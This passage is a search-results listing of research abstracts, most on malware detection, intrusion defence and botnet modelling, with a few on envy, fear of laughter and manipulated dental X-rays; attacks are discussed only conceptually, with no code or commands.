bounded, and generally acceptable period of time". To achieve software resiliency for space systems, acquirers and suppliers must identify relevant factors and systems engineering practices to apply across the lifecycle, in software requirements analysis, architecture development, design, implementation, verification and validation, and maintenance phases.

  5. DOE Office of Scientific and Technical Information (OSTI.GOV)

    Lee, Hsien-Hsin S

    The overall objective of this research project is to develop novel architectural techniques as well as system software to achieve a highly secure and intrusion-tolerant computing system. Such a system will be autonomous, self-adapting, and introspective, with self-healing capability under the circumstances of improper operations, abnormal workloads, and malicious attacks. The scope of this research includes: (1) System-wide, unified introspection techniques for autonomic systems, (2) Secure information-flow microarchitecture, (3) Memory-centric security architecture, (4) Authentication control and its implication to security, (5) Digital rights management, (6) Microarchitectural denial-of-service attacks on shared resources. During the period of the project, we developed several architectural techniques and system software for achieving a robust, secure, and reliable computing system toward our goal.

  6. Leveraging Client-Side DNS Failure Patterns to Identify Malicious Behaviors

    DTIC Science & Technology

    2015-09-28

    malicious behavior found in our dataset and (ii) to create ground truth to evaluate the system proposed in Section V. We begin by removing those cases that...2011. [10] S. Hao, N. Feamster, and R. Pandrangi, “Monitoring the Initial DNS Behavior of Malicious Domains,” in ACM IMC , 2011. [11] R. Perdisci et...distribution is unlimited. Leveraging Client-Side DNS Failure Patterns to Identify Malicious Behaviors The views, opinions and/or findings contained in

  7. Detecting the manipulation of digital clinical records in dental practice.

    PubMed

    Díaz-Flores-García, V; Labajo-González, E; Santiago-Sáez, A; Perea-Pérez, B

    2017-11-01

    Radiography provides many advantages in the diagnosis and management of dental conditions. However, dental X-ray images may be subject to manipulation with malicious intent using easily accessible computer software. In this study, we sought to evaluate a dentist's ability to identify a manipulated dental X-ray image, when compared with the original, using a variant of the methodology described by Visser and Kruger. Sixty-six dentists were invited to participate and evaluate 20 intraoral dental X-ray images, 10 originals and 10 modified, manipulated using Adobe Photoshop to simulate fillings, root canal treatments, etc. Participating dentists were correct in identifying the manipulated image in 56% of cases, 6% higher than by chance and 10% more than in the study by Visser and Kruger. Malicious changes to dental X-ray images may go unnoticed even by experienced dentists. Professionals must be aware of the legal consequences of such changes. A system of detection/validation should be created for radiographic images. Copyright © 2017 The College of Radiographers. Published by Elsevier Ltd. All rights reserved.

  8. Index of cyber integrity

    NASA Astrophysics Data System (ADS)

    Anderson, Gustave

    2014-05-01

    Unfortunately, there is no metric, nor set of metrics, that are both general enough to encompass all possible types of applications yet specific enough to capture the application and attack specific details. As a result we are left with ad-hoc methods for generating evaluations of the security of our systems. Current state of the art methods for evaluating the security of systems include penetration testing and cyber evaluation tests. For these evaluations, security professionals simulate an attack from malicious outsiders and malicious insiders. These evaluations are very productive and are able to discover potential vulnerabilities resulting from improper system configuration, hardware and software flaws, or operational weaknesses. We therefore propose the index of cyber integrity (ICI), which is modeled after the index of biological integrity (IBI) to provide a holistic measure of the health of a system under test in a cyber-environment. The ICI provides a broad base measure through a collection of application and system specific metrics. In this paper, following the example of the IBI, we demonstrate how a multi-metric index may be used as a holistic measure of the health of a system under test in a cyber-environment.

  9. Ultrabroadband photonic internet: safety aspects

    NASA Astrophysics Data System (ADS)

    Kalicki, Arkadiusz; Romaniuk, Ryszard

    2008-11-01

    Web applications have become the most popular medium on the Internet. Their popularity and the ease of use of web application frameworks, together with careless development, result in a high number of vulnerabilities and attacks. Several types of attacks are possible because of improper input validation. SQL injection is the ability to execute arbitrary SQL queries in a database through an existing application. Cross-site scripting is a vulnerability which allows malicious web users to inject code into the web pages viewed by other users. Cross-Site Request Forgery (CSRF) is an attack that tricks the victim into loading a page that contains a malicious request. Web spam in blogs is another concern. There are several techniques to mitigate these attacks. The most important are strong web application design, correct input validation, defined data types for each field, and parameterized statements in SQL queries. Server hardening with a firewall, modern security policy systems, and safe web framework interpreter configuration are essential. It is advised to maintain a proper security level on the client side, keep software updated, and install personal web firewalls or IDS/IPS systems. Good habits are logging out from services right after finishing work and using a separate web browser for the most important sites, such as e-banking.

  10. IDMA: improving the defense against malicious attack for mobile ad hoc networks based on ARIP protocol

    NASA Astrophysics Data System (ADS)

    Peng, Chaorong; Chen, Chang Wen

    2008-04-01

    Malicious nodes are mounting increasingly sophisticated attacking operations on Mobile Ad Hoc Networks (MANETs). This is mainly because IP-based MANETs are vulnerable to attacks by various malicious nodes. However, the defense against malicious attack can be improved when a new layer of network architecture is developed to prevent the true IP address from being disclosed to the malicious nodes. In this paper, we propose a new algorithm to improve the defense against malicious attack (IDMA) that is based on a recently developed Assignment Router Identify Protocol (ARIP) for clustering-based MANET management. In the ARIP protocol, we design the ARIP architecture based on the new Identity instead of the vulnerable IP addresses to provide the required security, embedded seamlessly into the overall network architecture. We make full use of ARIP's special property to monitor gateway-forwarded packets by Reply Request Route Packets (RREP) without an additional intrusion detection layer. We name this new algorithm IDMA because of its inherent capability to improve the defense against malicious attacks. Through IDMA, a watching algorithm can be established so as to counterattack the malicious node in the routing path when it unusually drops packets. We provide analysis examples for IDMA for the defense against a malicious node that disrupts the route discovery by impersonating the destination, by responding with corrupted routing information, or by disseminating forged control traffic. The IDMA algorithm is able to counterattack the malicious node in the cases when the node launches a DoS attack by broadcasting a large number of route requests, causes target traffic congestion by delivering a huge amount of data, or spoofs the IP addresses and sends forged packets with a fake ID to the same target, causing traffic congestion at that destination. 
We have implemented the IDMA algorithm using the GloMoSim simulator and have demonstrated its performance under a variety of operational conditions.

  11. Automated Virtual Machine Introspection for Host-Based Intrusion Detection

    DTIC Science & Technology

    2009-03-01

    boxes represent the code and data sections of each process in memory with arrows representing hooks planted by malware to jump to the malware code...a useful indication of intrusion, it is also susceptible to mimicry and concurrency attacks [Pro03,Wat07]. Additionally, most research abstracts away...sequence of system calls that accomplishes his or her intent [WS02]. This “ mimicry attack” takes advantage of the fact that many HIDS discard the pa

  12. Unintentional Insider Threats: A Review of Phishing and Malware Incidents by Economic Sector

    DTIC Science & Technology

    2014-07-01

    the conclusions in the Verizon Data Breach Report 2013 that 47% of malware was downloaded through e-mail at- tachments, 48% of hacking took place...the attackers pivoted onto other systems and databases and exfiltrated approximately 8.2 GB of data . BREACH : Accessing an employee account via a...Symantec. “Internet Security Threat Report 2014.” 2013 Trends 19 (April 2014). Symantec Cor- poration. [Verizon 2013] Verizon. 2013 Data Breach Investigations

  13. Optimal Sector Sampling for Drive Triage

    DTIC Science & Technology

    2013-06-01

    known files, which we call target data, that could help identify a drive holding evidence such as child pornography or malware. Triage is needed to sift...we call target data, that could help identify a drive holding evidence such as child pornography or malware. Triage is needed to sift through drives...situations where the user is looking for known data.1 One example is a law enforcement officer searching for evidence of child pornography from a large num

  14. Order priors for Bayesian network discovery with an application to malware phylogeny

    DOE PAGES

    Oyen, Diane; Anderson, Blake; Sentz, Kari; ...

    2017-09-15

    Here, Bayesian networks have been used extensively to model and discover dependency relationships among sets of random variables. We learn Bayesian network structure with a combination of human knowledge about the partial ordering of variables and statistical inference of conditional dependencies from observed data. Our approach leverages complementary information from human knowledge and inference from observed data to produce networks that reflect human beliefs about the system as well as to fit the observed data. Applying prior beliefs about partial orderings of variables is an approach distinctly different from existing methods that incorporate prior beliefs about direct dependencies (or edges) in a Bayesian network. We provide an efficient implementation of the partial-order prior in a Bayesian structure discovery learning algorithm, as well as an edge prior, showing that both priors meet the local modularity requirement necessary for an efficient Bayesian discovery algorithm. In benchmark studies, the partial-order prior improves the accuracy of Bayesian network structure learning as well as the edge prior, even though order priors are more general. Our primary motivation is in characterizing the evolution of families of malware to aid cyber security analysts. For the problem of malware phylogeny discovery, we find that our algorithm, compared to existing malware phylogeny algorithms, more accurately discovers true dependencies that are missed by other algorithms.

  15. Order priors for Bayesian network discovery with an application to malware phylogeny

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Oyen, Diane; Anderson, Blake; Sentz, Kari

    Here, Bayesian networks have been used extensively to model and discover dependency relationships among sets of random variables. We learn Bayesian network structure with a combination of human knowledge about the partial ordering of variables and statistical inference of conditional dependencies from observed data. Our approach leverages complementary information from human knowledge and inference from observed data to produce networks that reflect human beliefs about the system as well as to fit the observed data. Applying prior beliefs about partial orderings of variables is an approach distinctly different from existing methods that incorporate prior beliefs about direct dependencies (or edges) in a Bayesian network. We provide an efficient implementation of the partial-order prior in a Bayesian structure discovery learning algorithm, as well as an edge prior, showing that both priors meet the local modularity requirement necessary for an efficient Bayesian discovery algorithm. In benchmark studies, the partial-order prior improves the accuracy of Bayesian network structure learning as well as the edge prior, even though order priors are more general. Our primary motivation is in characterizing the evolution of families of malware to aid cyber security analysts. For the problem of malware phylogeny discovery, we find that our algorithm, compared to existing malware phylogeny algorithms, more accurately discovers true dependencies that are missed by other algorithms.

  16. A Study on Architecture of Malicious Code Blocking Scheme with White List in Smartphone Environment

    NASA Astrophysics Data System (ADS)

    Lee, Kijeong; Tolentino, Randy S.; Park, Gil-Cheol; Kim, Yong-Tae

    Recently, the interest in and demand for mobile communications have grown rapidly because of the increasing prevalence of smartphones around the world. In addition, existing feature phones have been replaced by smartphones, and with the explosive growth of Internet users using smartphones and e-commerce-enabled Internet banking transactions, the importance of protecting personal information has increased. Therefore, smartphone antivirus products have been developed and launched in order to prevent malicious code or virus infection. In this paper, we propose a new scheme to protect the smartphone from malicious code and malicious applications, which are elements of the security threats in the mobile environment, and to prevent information leakage from malicious code infection. The proposed scheme is based on a white list of smartphone applications, which only allows authorized applications to be installed and prevents the installation of malicious and untrusted mobile applications that could infect the applications and programs of the smartphone.

  17. Using a Prediction Model to Manage Cyber Security Threats.

    PubMed

    Jaganathan, Venkatesh; Cherurveettil, Priyesh; Muthu Sivashanmugam, Premapriya

    2015-01-01

    Cyber-attacks are an important issue faced by all organizations. Securing information systems is critical. Organizations should be able to understand the ecosystem and predict attacks. Predicting attacks quantitatively should be part of risk management. The cost impact due to worms, viruses, or other malicious software is significant. This paper proposes a mathematical model to predict the impact of an attack based on significant factors that influence cyber security. This model also considers the environmental information required. It is generalized and can be customized to the needs of the individual organization.

  18. Using a Prediction Model to Manage Cyber Security Threats

    PubMed Central

    Muthu Sivashanmugam, Premapriya

    2015-01-01

    Cyber-attacks are an important issue faced by all organizations. Securing information systems is critical. Organizations should be able to understand the ecosystem and predict attacks. Predicting attacks quantitatively should be part of risk management. The cost impact due to worms, viruses, or other malicious software is significant. This paper proposes a mathematical model to predict the impact of an attack based on significant factors that influence cyber security. This model also considers the environmental information required. It is generalized and can be customized to the needs of the individual organization. PMID:26065024

  19. FORENSIC ANALYSIS OF WINDOW’S® VIRTUAL MEMORY INCORPORATING THE SYSTEM’S PAGEFILE COUNTERINTELLIGENCE THROUGH MALICIOUS CODE ANALYSIS

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Jared Stimson

    FORENSIC ANALYSIS OF WINDOW’S® VIRTUAL MEMORY INCORPORATING THE SYSTEM’S PAGEFILE Computer Forensics is concerned with the use of computer investigation and analysis techniques in order to collect evidence suitable for presentation in court. The examination of volatile memory is a relatively new but important area in computer forensics. More recently, criminals are becoming more forensically aware and are now able to compromise computers without accessing the hard disk of the target computer. This means that the traditional incident response practice of pulling the plug will destroy the only evidence of the crime. While some techniques are available for acquiring the contents of main memory, few exist which can analyze these data in a meaningful way. One reason for this is how memory is managed by the operating system. Data belonging to one process can be distributed arbitrarily across physical memory or the hard disk, making it very difficult to recover useful information. This report will focus on how these disparate sources of information can be combined to give a single, contiguous address space for each process. Using address translation, a tool is developed to reconstruct the virtual address space of a process by combining a physical memory dump with the page-file on the hard disk. COUNTERINTELLIGENCE THROUGH MALICIOUS CODE ANALYSIS As computer network technology continues to grow, so does the reliance on this technology for everyday business functionality. To appeal to customers and employees alike, businesses are seeking an increased online presence, and to increase productivity the same businesses are computerizing their day-to-day operations. The combination of a publicly accessible interface to the business's network and the increase in the amount of intellectual property present on these networks presents serious risks. 
All of this intellectual property now faces constant attacks from a wide variety of malicious software that is intended to uncover company and government secrets. Every year billions of dollars are invested in preventing and recovering from the introduction of malicious code into a system. However, there is little research being done on leveraging these attacks for counterintelligence opportunities. With the ever-increasing number of vulnerable computers on the Internet, the task of attributing these attacks to an organization or a single person is a daunting one. This thesis will demonstrate the idea of intentionally running a piece of malicious code in a secure environment in order to gain counterintelligence on an attacker.

  20. WiFi networks and malware epidemiology

    PubMed Central

    Hu, Hao; Myers, Steven; Colizza, Vittoria; Vespignani, Alessandro

    2009-01-01

    In densely populated urban areas WiFi routers form a tightly interconnected proximity network that can be exploited as a substrate for the spreading of malware able to launch massive fraudulent attacks. In this article, we consider several scenarios for the deployment of malware that spreads over the wireless channel of major urban areas in the US. We develop an epidemiological model that takes into consideration prevalent security flaws on these routers. The spread of such a contagion is simulated on real-world data for georeferenced wireless routers. We uncover a major weakness of WiFi networks in that most of the simulated scenarios show tens of thousands of routers infected in as little as 2 weeks, with the majority of the infections occurring in the first 24–48 h. We indicate possible containment and prevention measures and provide computational estimates for the rate of encrypted routers that would stop the spreading of the epidemics by placing the system below the percolation threshold. PMID:19171909

  1. WiFi networks and malware epidemiology.

    PubMed

    Hu, Hao; Myers, Steven; Colizza, Vittoria; Vespignani, Alessandro

    2009-02-03

    In densely populated urban areas WiFi routers form a tightly interconnected proximity network that can be exploited as a substrate for the spreading of malware able to launch massive fraudulent attacks. In this article, we consider several scenarios for the deployment of malware that spreads over the wireless channel of major urban areas in the US. We develop an epidemiological model that takes into consideration prevalent security flaws on these routers. The spread of such a contagion is simulated on real-world data for georeferenced wireless routers. We uncover a major weakness of WiFi networks in that most of the simulated scenarios show tens of thousands of routers infected in as little as 2 weeks, with the majority of the infections occurring in the first 24-48 h. We indicate possible containment and prevention measures and provide computational estimates for the rate of encrypted routers that would stop the spreading of the epidemics by placing the system below the percolation threshold.

  2. Effect of Gratitude on Benign and Malicious Envy: The Mediating Role of Social Support.

    PubMed

    Xiang, Yanhui; Chao, Xiaomei; Ye, Yanyan

    2018-01-01

    Gratitude has been investigated in various areas in psychology. The present research showed that gratitude had some positive effects on some aspects of our life, such as subjective well-being, life satisfaction, and social relationships. It can also help us relieve negative emotions. However, the existing literature has not studied the influence of gratitude on envy. The present study used structural equation modeling to test the mediating role of social support between gratitude and two types of envy (malicious and benign). We recruited 426 Chinese undergraduates to complete the Gratitude Questionnaire, Malicious and Benign Envy Scales, and the Multi-Dimensional Scale of Perceived Social Support. Results showed that gratitude positively predicted benign envy and negatively predicted malicious envy. In addition, the indirect effect of gratitude on two types of envy via social support was significant. These results revealed the direct relationship between gratitude and malicious/benign envy, and the mediating effect of social support, which will contribute to find effective measures to inhibit malicious envy and promote benign envy from the perspective of cultivating gratitude and increasing individuals' social support.

  3. Effect of Gratitude on Benign and Malicious Envy: The Mediating Role of Social Support

    PubMed Central

    Xiang, Yanhui; Chao, Xiaomei; Ye, Yanyan

    2018-01-01

    Gratitude has been investigated in various areas in psychology. The present research showed that gratitude had some positive effects on some aspects of our life, such as subjective well-being, life satisfaction, and social relationships. It can also help us relieve negative emotions. However, the existing literature has not studied the influence of gratitude on envy. The present study used structural equation modeling to test the mediating role of social support between gratitude and two types of envy (malicious and benign). We recruited 426 Chinese undergraduates to complete the Gratitude Questionnaire, Malicious and Benign Envy Scales, and the Multi-Dimensional Scale of Perceived Social Support. Results showed that gratitude positively predicted benign envy and negatively predicted malicious envy. In addition, the indirect effect of gratitude on two types of envy via social support was significant. These results revealed the direct relationship between gratitude and malicious/benign envy, and the mediating effect of social support, which will contribute to find effective measures to inhibit malicious envy and promote benign envy from the perspective of cultivating gratitude and increasing individuals' social support. PMID:29867595

  4. A fragile zero watermarking scheme to detect and characterize malicious modifications in database relations.

    PubMed

    Khan, Aihab; Husain, Syed Afaq

    2013-01-01

    We put forward a fragile zero watermarking scheme to detect and characterize malicious modifications made to a database relation. Most of the existing watermarking schemes for relational databases introduce intentional errors or permanent distortions as marks into the original database content. These distortions inevitably degrade the data quality and data usability, as the integrity of the relational database is violated. Moreover, these fragile schemes can detect malicious data modifications but do not characterize the tampering attack, that is, the nature of the tampering. The proposed fragile scheme is based on a zero watermarking approach to detect malicious modifications made to a database relation. In zero watermarking, the watermark is generated (constructed) from the contents of the original data rather than by introducing permanent distortions as marks into the data. As a result, the proposed scheme is distortion-free; thus, it also resolves the inherent conflict between security and imperceptibility. The proposed scheme also characterizes the malicious data modifications to quantify the nature of tampering attacks. Experimental results show that even minor malicious modifications made to a database relation can be detected and characterized successfully.

  5. Gelotophobia and the Challenges of Implementing Laughter into Virtual Agents Interactions

    PubMed Central

    Ruch, Willibald F.; Platt, Tracey; Hofmann, Jennifer; Niewiadomski, Radosław; Urbain, Jérôme; Mancini, Maurizio; Dupont, Stéphane

    2014-01-01

    This study investigated which features of avatar laughter are perceived as threatening by individuals with a fear of being laughed at (gelotophobia) and by individuals without gelotophobia. Laughter samples were systematically varied (e.g., intensity, laughter pitch, and energy for the voice, intensity of facial actions for the face) in three modalities: animated facial expressions, synthesized auditory laughter vocalizations, and motion-capture-generated puppets displaying laughter body movements. In the online study, 123 adults completed the GELOPH<15> (Ruch and Proyer, 2008a,b) and rated randomly presented videos of the three modalities for how malicious, how friendly, and how real the laughter was (0 not at all to 8 extremely). Additionally, an open question asked which markers led to the perception of friendliness/maliciousness. The current study identified features in all modalities of laughter stimuli that were perceived as malicious in general, and some that were gelotophobia specific. For facial expressions of avatars, medium-intensity laughs triggered the highest maliciousness in the gelotophobes. In the auditory stimuli, the fundamental frequency modulations and the variation in intensity were indicative of maliciousness. In the body, backward and forward movements and rocking vs. jerking movements distinguished the most malicious from the least malicious laugh. From the open answers, the shape and appearance of the lips curling induced feelings that the expression was malicious for non-gelotophobes, and the movement around the eyes made the face appear friendly. This was the opposite for gelotophobes. Gelotophobia-savvy avatars should be of high intensity, contain lip and eye movements, and have fast, non-repetitive voiced vocalization that is variable and of short duration. They should not contain any features that indicate a down-regulation in the voice or body, or that indicate voluntary/cognitive modulation. PMID:25477803

  6. Mobile code security

    NASA Astrophysics Data System (ADS)

    Ramalingam, Srikumar

    2001-11-01

    A highly secure mobile agent system is very important for a mobile computing environment. The security issues in a mobile agent system comprise protecting mobile hosts from malicious agents, protecting agents from other malicious agents, protecting hosts from other malicious hosts, and protecting agents from malicious hosts. Using traditional security mechanisms, the first three security problems can be solved. Apart from using trusted hardware, very few approaches exist to protect mobile code from malicious hosts. Some of the approaches to solve this problem are the use of trusted computing, computing with encrypted functions, steganography, cryptographic traces, the Seal Calculus, etc. This paper focuses on the simulation of some of these existing techniques in the designed mobile language. Some new approaches to solve the malicious network problem and the agent tampering problem are developed using a public key encryption system and steganographic concepts. The approaches are based on encrypting and hiding the partial solutions of the mobile agents. The partial results are stored and the address of the storage is destroyed as the agent moves from one host to another host. This allows only the originator to make use of the partial results. Through these approaches some of the existing problems are solved.

  7. Windows Instant Messaging App Forensics: Facebook and Skype as Case Studies

    PubMed Central

    Yang, Teing Yee; Dehghantanha, Ali; Choo, Kim-Kwang Raymond; Muda, Zaiton

    2016-01-01

    Instant messaging (IM) has changed the way people communicate with each other. However, the interactive and instant nature of these applications (apps) made them an attractive choice for malicious cyber activities such as phishing. The forensic examination of IM apps for modern Windows 8.1 (or later) has been largely unexplored, as the platform is relatively new. In this paper, we seek to determine the data remnants from the use of two popular Windows Store application software for instant messaging, namely Facebook and Skype on a Windows 8.1 client machine. This research contributes to an in-depth understanding of the types of terrestrial artefacts that are likely to remain after the use of instant messaging services and application software on a contemporary Windows operating system. Potential artefacts detected during the research include data relating to the installation or uninstallation of the instant messaging application software, log-in and log-off information, contact lists, conversations, and transferred files. PMID:26982207

  8. Windows Instant Messaging App Forensics: Facebook and Skype as Case Studies.

    PubMed

    Yang, Teing Yee; Dehghantanha, Ali; Choo, Kim-Kwang Raymond; Muda, Zaiton

    2016-01-01

    Instant messaging (IM) has changed the way people communicate with each other. However, the interactive and instant nature of these applications (apps) made them an attractive choice for malicious cyber activities such as phishing. The forensic examination of IM apps for modern Windows 8.1 (or later) has been largely unexplored, as the platform is relatively new. In this paper, we seek to determine the data remnants from the use of two popular Windows Store application software for instant messaging, namely Facebook and Skype on a Windows 8.1 client machine. This research contributes to an in-depth understanding of the types of terrestrial artefacts that are likely to remain after the use of instant messaging services and application software on a contemporary Windows operating system. Potential artefacts detected during the research include data relating to the installation or uninstallation of the instant messaging application software, log-in and log-off information, contact lists, conversations, and transferred files.

  9. Dispositional envy revisited: unraveling the motivational dynamics of benign and malicious envy.

    PubMed

    Lange, Jens; Crusius, Jan

    2015-02-01

    Previous research has conceptualized dispositional envy as a unitary construct. Recently however, episodic envy has been shown to emerge in two qualitatively different forms. Benign envy is related to the motivation to move upward, whereas malicious envy is related to pulling superior others down. In four studies (N = 1,094)--using the newly developed Benign and Malicious Envy Scale (BeMaS)--we show that dispositional envy is also characterized by two independent dimensions related to distinct motivational dynamics and behavioral consequences. Dispositional benign and malicious envy uniquely predict envious responding following upward social comparisons. Furthermore, they are differentially connected to hope for success and fear of failure. Corresponding to these links, dispositional benign envy predicted faster race performance of marathon runners mediated via higher goal setting. In contrast, dispositional malicious envy predicted race goal disengagement. The findings highlight that disentangling the two sides of envy opens up numerous research avenues. © 2014 by the Society for Personality and Social Psychology, Inc.

  10. GlobalTrust: An Attack Resilient Reputation System for Tactical Networks

    DTIC Science & Technology

    2014-07-03

    MSA): Some malicious nodes misbehave while other malicious nodes, called malicious spies, behave normally by providing proper services. These...disseminate conflicting (or inconsistent) LTOs. For example, they may misbehave only to a subset of honest nodes (referred to as target nodes) to... misbehaving with prob. α honestly reporting LTOs NRA misbehaving with prob. α reporting opposite LTOs, 1− α CRA misbehaving with prob. α reporting

  11. Social Networking—Another Breach In The Wall

    NASA Astrophysics Data System (ADS)

    Bamnote, Gajendra; Patil, Gajendra; Shejole, Amol

    2010-11-01

    With the increasing popularity of social networks like Facebook and MySpace, such sites have lately become the favourite destinations for spammers and attackers. Social networks have experienced complex social engineering attacks, massive spam and aggressive malware distribution in the recent past. This paper presents a practical case study of social engineering, malware distribution and phishing attacks against social networking sites that were identified over the last few months. It explains how users' private data are exposed to attackers and how easily their privacy is compromised as a result of these attacks and their own careless behaviour.

  12. Secure VM for Monitoring Industrial Process Controllers

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Dasgupta, Dipankar; Ali, Mohammad Hassan; Abercrombie, Robert K

    2011-01-01

    In this paper, we examine the biological immune system as an autonomic system for self-protection, which has evolved over millions of years, probably through an extensive process of redesigning, testing, tuning and optimization. The powerful information processing capabilities of the immune system, such as feature extraction, pattern recognition, learning, memory, and its distributed nature, provide rich metaphors for its artificial counterpart. Our study focuses on building an autonomic defense system, using some immunological metaphors for information gathering, analyzing, decision making and launching threat and attack responses. In order to detect Stuxnet-like malware, we propose adding a secure VM (or dedicated host) to the SCADA network to monitor behavior and all software updates. This on-going research effort does not aim to mimic nature but to explore and learn valuable lessons useful for self-adaptive cyber defense systems.

  13. Design of Cyber Attack Precursor Symptom Detection Algorithm through System Base Behavior Analysis and Memory Monitoring

    NASA Astrophysics Data System (ADS)

    Jung, Sungmo; Kim, Jong Hyun; Cagalaban, Giovanni; Lim, Ji-Hoon; Kim, Seoksoo

    More recently, botnet-based cyber attacks, including spam mail and DDoS attacks, have sharply increased, which poses a fatal threat to Internet services. At present, antivirus businesses make it their top priority to detect malicious code in the shortest time possible (Lv.2), based on the graph showing the relation between the spread of malicious code and time, which allows them to detect it after the malicious code occurs. Despite early detection, however, it is not possible to prevent malicious code from occurring. Thus, we have developed an algorithm that can detect precursor symptoms at Lv.1 to prevent a cyber attack that uses the evasion method of an 'executing environment aware attack', by analyzing system behaviors and monitoring memory.

  14. Advancing botnet modeling techniques for military and security simulations

    NASA Astrophysics Data System (ADS)

    Banks, Sheila B.; Stytz, Martin R.

    2011-06-01

    Simulation environments serve many purposes, but they are only as good as their content. One of the most challenging and pressing areas that call for improved content is the simulation of bot armies (botnets) and their effects upon networks and computer systems. Botnets are a new type of malware, a type that is more powerful and potentially dangerous than any other type of malware. A botnet's power derives from several capabilities, including the following: 1) the botnet's capability to be controlled and directed throughout all phases of its activity, 2) a command and control structure that grows increasingly sophisticated, and 3) the ability of a bot's software to be updated at any time by the owner of the bot (a person commonly called a bot master or bot herder). Not only is a bot army powerful and agile in its technical capabilities, a bot army can be extremely large, comprising tens of thousands, if not millions, of compromised computers, or it can be as small as a few thousand targeted systems. In all botnets, their members can surreptitiously communicate with each other and their command and control centers. In sum, these capabilities allow a bot army to execute attacks that are technically sophisticated, difficult to trace, tactically agile, massive, and coordinated. To improve our understanding of their operation and potential, we believe that it is necessary to develop computer security simulations that accurately portray bot army activities, with the goal of including bot army simulations within military simulation environments. In this paper, we investigate issues that arise when simulating bot armies and propose a combination of the biologically inspired MSEIR infection spread model coupled with the jump-diffusion infection spread model to portray botnet propagation.

  15. Cyber Moat: Adaptive Virtualized Network Framework for Deception and Disinformation

    DTIC Science & Technology

    2016-12-12

    As one type of bots, web crawlers have been leveraged by search engines (e.g., Googlebot by Google) to popularize websites through website indexing...However, the number of malicious bots is increasing too. To regulate the behavior of crawlers, most websites include a file called "robots.txt" that...However, "robots.txt" only provides a guideline, and almost all malicious robots ignore it. Moreover, since this file is publicly available, malicious

  16. Leveling up and down: the experiences of benign and malicious envy.

    PubMed

    van de Ven, Niels; Zeelenberg, Marcel; Pieters, Rik

    2009-06-01

    Envy is the painful emotion caused by the good fortune of others. This research empirically supports the distinction between two qualitatively different types of envy, namely benign and malicious envy. It reveals that the experience of benign envy leads to a moving-up motivation aimed at improving one's own position, whereas the experience of malicious envy leads to a pulling-down motivation aimed at damaging the position of the superior other. Study 1 used guided recall of the two envy types in a culture (the Netherlands) that has separate words for benign and malicious envy. Analyses of the experiential content of these emotions found the predicted differences. Study 2 and 3 used one sample from the United States and one from Spain, respectively, where a single word exists for both envy types. A latent class analysis based on the experiential content of envy confirmed the existence of separate experiences of benign and malicious envy in both these cultures as well. The authors discuss the implications of distinguishing the two envy types for theories of cooperation, group performance, and Schadenfreude.

  17. Architecture for removable media USB-ARM

    DOEpatents

    Shue, Craig A.; Lamb, Logan M.; Paul, Nathanael R.

    2015-07-14

    A storage device is coupled to a computing system comprising an operating system and application software. Access to the storage device is blocked by a kernel filter driver, except exclusive access is granted to a first anti-virus engine. The first anti-virus engine is directed to scan the storage device for malicious software and report results. Exclusive access may be granted to one or more other anti-virus engines and they may be directed to scan the storage device and report results. Approval of all or a portion of the information on the storage device is based on the results from the first anti-virus engine and the other anti-virus engines. The storage device is presented to the operating system and access is granted to the approved information. The operating system may be a Microsoft Windows operating system. The kernel filter driver and usage of anti-virus engines may be configurable by a user.
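    The gating described in this abstract (block the device, let each engine scan it in turn, expose only what the results approve) can be modelled in user space. The following Python block is an added example, not the patent's code: the in-memory "device", the byte-pattern signatures of the two engines and the approval policy (a file is approved only when no engine flags it) are all constructed assumptions for illustration. The kernel filter driver itself is not reproduced; the model only shows how the per-engine verdicts combine into the view the operating system is allowed to see.

```python
"""Added example, not the USB-ARM patent's code: a user-space model of
scan-then-approve access to removable media. Device contents, engine
signatures and the approval policy are constructed assumptions."""
from dataclasses import dataclass

# Constructed sample device contents (path -> bytes); markers stand in for
# real signature bytes.
DEVICE = {
    "report.txt": b"quarterly numbers attached",
    "tool.exe": b"MZ\x90\x00" + b"\x00" * 16 + b"EVIL-MARKER-A",
    "notes.txt": b"meeting at noon",
    "dropper.bin": b"\x7fELF" + b"EVIL-MARKER-B",
}


@dataclass
class SignatureEngine:
    """A minimal anti-virus engine: substring signatures over file bytes."""
    name: str
    signatures: dict  # detection name -> byte pattern (assumed)

    def scan(self, device):
        """Return {path: [detection names]} for every file on the device."""
        return {
            path: [n for n, pat in self.signatures.items() if pat in data]
            for path, data in device.items()
        }


# Two engines with disjoint signature sets, so each one alone would miss a file.
ENGINES = [
    SignatureEngine("engine-1", {"Trojan.A": b"EVIL-MARKER-A"}),
    SignatureEngine("engine-2", {"Trojan.B": b"EVIL-MARKER-B"}),
]


def approve(device, engines):
    """Give each engine the device in turn (one holder at a time, as the filter
    driver's exclusive grant implies) and merge the verdicts. Policy (assumed):
    a file is approved only if no engine flagged it."""
    verdicts = {path: [] for path in device}
    for engine in engines:
        for path, hits in engine.scan(device).items():
            verdicts[path].extend(f"{engine.name}:{h}" for h in hits)
    approved = {p for p, hits in verdicts.items() if not hits}
    return approved, verdicts


def mount_view(device, engines):
    """The view handed to the operating system: approved files only; everything
    else stays behind the block."""
    approved, verdicts = approve(device, engines)
    return {p: device[p] for p in sorted(approved)}, verdicts


if __name__ == "__main__":
    view, verdicts = mount_view(DEVICE, ENGINES)
    for path, hits in verdicts.items():
        print(f"{path:12s} {'ALLOW' if path in view else 'BLOCK'} {hits}")
```

Because the two engines' signature sets are disjoint, each file is caught by exactly one engine; the combined policy blocks both, which is the point of chaining engines before presenting the device.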

  18. Bifurcation analysis of a delay reaction-diffusion malware propagation model with feedback control

    NASA Astrophysics Data System (ADS)

    Zhu, Linhe; Zhao, Hongyong; Wang, Xiaoming

    2015-05-01

    With the rapid development of network information technology, information network security has become a very critical issue in our work and daily life. This paper attempts to develop a delay reaction-diffusion model with a state feedback controller to describe the process of malware propagation in mobile wireless sensor networks (MWSNs). By analyzing the stability and Hopf bifurcation, we show that the state feedback method can successfully be used to control unstable steady states or periodic oscillations. Moreover, formulas for determining the properties of the bifurcating periodic oscillations are derived by applying the normal form method and center manifold theorem. Finally, we conduct extensive simulations on large-scale MWSNs to evaluate the proposed model. Numerical evidence shows that the linear term of the controller is enough to delay the onset of the Hopf bifurcation, and that the properties of the bifurcation can be regulated to achieve some desirable behaviors by choosing the appropriate higher-order terms of the controller. Furthermore, we find that the spatial-temporal dynamic characteristics of malware propagation are closely related to the rate constant for nodes leaving the infective class for the recovered class and to the mobile behavior of nodes.

  19. Design of Provider-Provisioned Website Protection Scheme against Malware Distribution

    NASA Astrophysics Data System (ADS)

